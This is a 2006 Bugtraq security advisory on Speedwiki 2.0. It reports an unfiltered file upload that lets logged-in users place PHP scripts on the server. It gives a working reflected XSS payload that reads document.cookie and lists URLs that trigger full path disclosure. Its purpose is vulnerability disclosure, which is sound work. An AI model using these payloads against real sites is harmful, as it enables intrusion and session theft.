[<prev] [next>] [day] [month] [year] [list]
Message-ID: <20061108185212.25749.qmail@securityfocus.com>
Date: 8 Nov 2006 18:52:12 -0000
From: saps.audit@...il.com
To: bugtraq@...urityfocus.com
Subject: Speedwiki 2.0 Arbitrary File Upload Vulnerability
product :Speedwiki 2.0
vendor site: http://speedywiki.sourceforge.net/
risk:critical
a user logged in , can upload a PHP script on the server , by the upload script , there's actually no upload filter on this cms
path : /speedywiki/index.php?upload=1
xss get :
/index.php?showRevisions=</textarea>'"><script>alert(document.cookie)</script>
full path disclosure :
/speedywiki/index.php?showRevisions[]=
/speedywiki/index.php?searchText[]=
/speedywiki/upload.php
laurent gaffié & benjamin mossé
http://s-a-p.ca/
contact: saps.audit@...il.com
Powered by blists - more mailing lists